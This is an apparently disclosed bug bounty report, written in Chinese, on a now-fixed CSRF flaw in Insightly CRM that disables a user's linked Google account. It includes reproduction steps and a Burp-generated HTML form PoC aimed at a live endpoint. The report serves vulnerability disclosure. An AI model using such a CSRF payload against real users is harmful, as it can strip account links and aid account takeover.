CSRF漏洞允许禁用用户推荐功能的Gmail联系人链接

漏洞概述

当用户通过 https://crm.na1.insightly.com/users/referrals 添加推荐到其账户时，会获得关联账户的ID。当用户尝试在"连接应用设置"中禁用关联账户时，端点 https://crm.na1.insightly.com/users/usersettings 会发送包含ID的请求：https://crm.na1.insightly.com/Users/GoogleDisable/2023554。

该易受攻击的端点允许认证用户更改与其账户关联的电子邮件地址并移除（禁用）它，但未能充分验证请求是否由用户有意执行（例如通过检查HTTP头值）。

复现步骤

1. 需要两个账户来确认问题：账户A和账户B
2. 访问 https://crm.na1.insightly.com/users/referrals 并为两个账户添加Google推荐
3. 关联账户将获得两个不同的ID
4. 从账户A访问 https://crm.na1.insightly.com/users/usersettings，尝试禁用关联账户并使用Burp代理捕获请求
5. 使用禁用请求生成PoC
6. 当从账户B打开链接时，漏洞将被利用

概念验证(PoC)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://crm.na1.insightly.com/Users/GoogleDisable/2026462">
      <input type="hidden" name="_pjax" value="#main" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

当发送请求时，ID将自动更改，因此受害者的关联账户将被禁用。

影响分析

攻击者可利用此漏洞禁用账户链接或通过将账户与攻击者控制的地址关联来接管账户，然后执行密码重置。为了使攻击成功，目标用户账户必须与未确认的电子邮件地址关联，且目标用户必须在登录时访问攻击者控制的网站。

时间线

• 2022年8月13日 - khaledx向Insightly提交报告
• 2022年10月-2023年10月 - 多次询问更新状态
• 2023年10月24日 - 请求HackerOne支持调解
• 2023年10月25日 - Insightly给予奖励并邀请重测
• 2023年10月25日 - 完成重测，确认漏洞已修复
• 2024年1月4日 - 报告关闭，状态改为已解决
• 2025年8月20日 - 请求披露报告
• 2025年9月19日 - 报告被披露

漏洞详情

• 报告ID: #1668489
• 状态: 已解决
• 严重程度: 中等(4.2)
• 弱点: 跨站请求伪造(CSRF)
• CVE ID: 无

Insightly团队在回应中表示，他们已暂停漏洞赏金计划以处理已报告漏洞的积压，并致力于增强安全系统以防止未来发生类似事件。